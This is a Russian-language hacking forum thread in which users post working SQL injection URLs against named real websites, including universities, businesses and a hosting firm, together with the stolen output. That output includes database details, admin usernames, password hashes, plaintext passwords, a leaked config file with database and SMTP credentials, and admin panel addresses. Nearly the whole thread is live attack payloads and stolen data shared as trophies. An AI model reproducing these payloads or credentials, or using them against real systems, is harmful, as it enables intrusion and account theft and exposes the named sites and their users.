SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    PageRank: 6

    http://www.sa-venues.com/admin/

    root:*34D244FE504DCCF2C76FE6089242805D0ADC267A

    Database Version: 4.1.14-nt
    Database name: yokel33
    User name: [email protected]
     
  2. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    PR2

    http://www.jouanel.com/choix.php?lng=5&parent=-5+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),database(),user()),5--

    Database Version: 5.0.32-Debian_7etch6-log
    Database name: jouanel
    User name: [email protected]



    сайт тоже румынский

    админка
    www.jouanel.com/admin/
    еще интересно вот тут
    www.jouanel.com/admin.back/
     
  3. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    PageRank: 5

    ethaicdsecure:d^hxbjowrR^ipN0760

    Database Version: 5.0.45
    Database name: ethaicd
    User name: ethaicd@localhost


    PageRank: 5

    вывод в шапке

    admin:admin

    Database Version: 5.0.51a-3ubuntu5.4-log
    Database name: olomoucgui
    User name: [email protected]
     
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    PR3

    http://www.vaccin.ro/index.php?s=6&p=-13+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6--

    Database Version: 4.1.22-log
    Database name: vaccin
    User name: vaccinuser@localhost
     
  5. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25

    Database Version: 4.1.10a-nt-log
    Database name: omicron
    User name: [email protected]





    Database Version: 4.1.22-standard
    Database name: sarut
    User name: hostsaru@localhost



    root : *64AA67B0A3F7FBAFE6E4C07862C61EE66AFE40E6
     
  6. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    PageRank: 5

    admin:0429d0a901e5afb487e88c8fc2a95f17:billclinton

    Database Version: 5.0.51a-community
    Database name: jkcement_newjkcement
    User name: jkcement_newjk@localhost
     
  7. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    http://www.abi-trade.ru/memory.php?id=-315%20union%20select%20version(),2,3,4--

    Седня нефига не рыбный день, один сайт всего за 3 часа.. Ужос =)
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://firme.dingalati.ro/firme/347/index.php?id=8+union+select+1,concat_ws(0x3a,version(),user(),database()),3

    Database Version: 5.0.37-standard
    Database name: dingalati_firme
    User name: dingalati_cis@localhost



    http://firme.dingalati.ro/firme/347/index.php?id=8+union+select+1,concat_ws(0x3a,username,password,email_address),3+from+dingalati_ads.ox_users

    compitserv:c478d1475034678fb22684a7443cd04f:eek:[email protected]



    http://firme.dingalati.ro/firme/347/index.php?id=8+union+select+1,concat_ws(0x3a,user_login,user_nicename,user_pass,user_email),3+from+dingalati_apg.wp_users


    admin:$P$BFljCZY9nDTLPm9Ey5C2SFJxMMp8qw.:admin:[email protected]
    Viorel:$P$BpftK2RsBOon8wGBgJRxy2tFr9PvRG/:viorel:[email protected]
     
    3 people like this.
  9. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    Hosting / Indonesia

    PageRank: 3

    http://www.solindohost.com/admin

    root:root
    webmaster:solindohost2005
    user:passwd

    Database Version: solindoh_solindoh
    Database name: 5.0.67-community
    User name: solindoh_newslh@localhost
     
  10. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Database Version: 4.1.21
    Database name: aupcalendar
    User name: [email protected]

    /data/11/1/73/148/1073963/user/1112542/htdocs/aupcal2/form.php


    Читаем /etc/passwd




    Читаем /data/11/1/73/148/1073963/user/1112542/htdocs/aupcal2/cfg/config.php

    Получаем

    include_once("phpself_scriptname.fix.php");
    define("dbname","aupcalendar");
    define("hostname","205.178.146.23");
    define("username","acandia2007");
    define("password","AUPcal2007a");
    define("smtpuser","acandia");
    define("smtppass","paris");
    define("mail","[email protected]");
    define("adm_mail","[email protected]");
    define("TEMPLATE_PATH","template");
    define("date_of_install","2007-11-11");


    Заходим в PHPMYADMIN

    http://205.178.146.23/


    логин Admin пароль acandia2007b

    Админка

     
    2 people like this.
  11. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.kstore.ro/index.php?opt=showall&grup=-8+union+select+1,concat_ws(0x3a,version(),database(),user()),3--


    Database Version: 5.0.67-community
    Database name: kstorer_kstore
    User name: kstorer_kstore@localhost


    http://www.kstore.ro/index.php?opt=showall&grup=-8+union+select+1,concat_ws(0x3a,username,password),3+from+admins--

    ralumihai:bdb8c008fa551ba75f8481963f2201da: tutu
    админка
    http://www.kstore.ro/admin/
     
    1 person likes this.
  12. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.aui.edu/pr.php?id=-20071110%27+union+select+1,2,3,4,5,convert(version()+using+latin1),7,8,9,10,11,12,13,14/*
    4.1.18-standard-log

    PR: 7

    \\ээм, у меня поиск не работет
     
    _________________________
    4 people like this.
  13. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.comunitati.net/no_login/index.php?modul=comunitati&categ=orase&id_tara=-6+union+select+1,concat_ws(0x3a,version(),database(),user()),3/*


    Version: 4.0.27-max-log
    Database: paulstaicu
    User: [email protected]
     
    1 person likes this.
  14. hackmen

    hackmen Banned

    Joined:
    22 Oct 2007
    Messages:
    110
    Likes Received:
    46
    Reputations:
    1
    PR6

    http://www.coa.gatech.edu/id/event.php?id=-3736+union+select++1,2,3,4,5,concat(pw,0x3a,username),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+user_logins+where+ID=1--

    Если кто найдет админку куда подйдет логин и пасс- дайте знать, плиз. =)
    +
    UPD

    http://www2.ric.edu/news/displayNews.php?id=news-99999+union+select+concat(Username,0x3a,Password),2,3,4,5,6+from+int_users--

    cberube:rainbow

    http://www2.ric.edu/admin/
     
    #7574 hackmen, 4 Feb 2009
    Last edited: 4 Feb 2009
    1 person likes this.
  15. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    По всей видимости пассы от галлереи, но она снесена, robots.txt тебе в руки.
    Не совсем то, но
    HTML:
    http://www.coa.gatech.edu/id/event.php?id=-3736+union+select++1,2,3,4,5,group_concat(concat_ws(0x3A,option_name,option_value)+SEPARATOR+0x3c62723e),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+blogs.wp_president_options--
    
    http://www.gatech.edu/blogs/president - wp(6.3)
    www.gatech.edu PageRank: 8 тИЦ: 850

    вот юзеры
    HTML:
    http://www.coa.gatech.edu/id/event.php?id=-3736+union+select++1,2,3,4,5,group_concat(concat(user_pass,0x3A,user_login,0x3c62723e)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+blogs.wp_president_users--
    
    $P$BTtoA2y6jOaVJGW3ImqzvO7tpPsqwg1:admin
    $P$BWlRTtFjpvji9sdoeZwxi/OG9a9iUe.:bryan
    $P$BKkhNwEyoo5vKYR54gIbnV9qFkMe4v0:michael
    хотя учитывая что в wp новых версий ну очень трудно побрутить хеш то это безсмыслено.
     
    2 people like this.
  16. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.star-storage.ro/produse_detalii.asp?ID=11[SQL]

    Version: 5.0.51a-community-nt
    DataBase: star-storage
    User: star-storage@localhost



    Впервые встретил такую связку ASP+MySQL, гибрид.Поля выводимые не нашел, вывел все брутом, есть таблица users с колонками: UserName, password, user, parola.

    админка
    www.star-storage.ro/admin
    юзеров не брутил..времени и желания нет, кто хочет поковырятся ...вперёд. Удачи.


    З.Ы. Jokester извини за бояны.. моя ошибка
     
    1 person likes this.
  17. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Database Version:4.0.18
    User name:groth@localhost
    Database name:groth


    Database Version:4.1.22-standard
    User name:bragada_ebed@localhost
    Database name:bragada_ebed


    Database Version:4.1.22-log
    User name:ceke9mzd9e@localhost
    Database name:live_jazz




    Database Version: 5.0.67-log
    Database name: varsity_data
    User name: varsity_user@localhost
     
  18. BloodyMessage

    BloodyMessage Elder - Старейшина

    Joined:
    20 Aug 2006
    Messages:
    190
    Likes Received:
    41
    Reputations:
    11
    RP5

    turner:fooBar
    mmsa:slazNEL

    4.1.22-standard
    mmsa_mmsa@localhost
    mmsa_mmsa

    ********************************************

    PR4

    Database Version: 5.0.45
    Database name: veeteecom
    User name: veeteecom@localhost

    Админка:
    http://www.veeteedinein.co.uk/admin/
    admin1:u#ddaa!212@mmcom
     
    #7578 BloodyMessage, 4 Feb 2009
    Last edited: 4 Feb 2009
  19. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Dbname: sports
    Version: 5.0.51a-3ubuntu5.4-log
    Username: sports@localhost
    около 57 таблиц.
     
    #7579 $n@ke, 4 Feb 2009
    Last edited: 4 Feb 2009
    1 person likes this.
  20. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    http://www.rfrap.ru Сайт Ростовского филиала Российской академии правосудия=)

    юзер:
    http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),1,1)))=114 r
    http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),2,1)))=102 f
    http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),3,1)))=114 r
    http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),4,1)))=97 a
    http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),5,1)))=112 p
    http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),6,1)))=64 @
    http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),7,1)))=108 l
    http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),8,1)))=111 o
    http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),9,1)))=99 c
    http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),10,1)))=97 a
    http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),11,1)))=108 l
    http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),12,1)))=104 h
    http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),13,1)))=111 o
    http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),14,1)))=115 s
    http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),15,1)))=116 t
    http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),16,1)))=0

    бд
    http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(database(),1,1)))=114 r
    http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(database(),2,1)))=102 f
    http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(database(),3,1)))=114 r
    http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(database(),4,1)))=97 a
    http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(database(),5,1)))=112 p
    http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(database(),6,1)))=0

    версия mysql
    http://www.rfrap.ru/site/index.php?newsfull=3+and+substring(version(),1,1)=3 3
    http://www.rfrap.ru/site/index.php?newsfull=3+and+substring(version(),2,1)=0 0
    http://www.rfrap.ru/site/index.php?newsfull=3+and+substring(version(),3,1)=2 2
    http://www.rfrap.ru/site/index.php?newsfull=3+and+substring(version(),4,1)=3 3

    P.S. Простите, что так много=)
    P.P.S. Уффф=)
     
    2 people like this.
Thread Status:
Not open for further replies.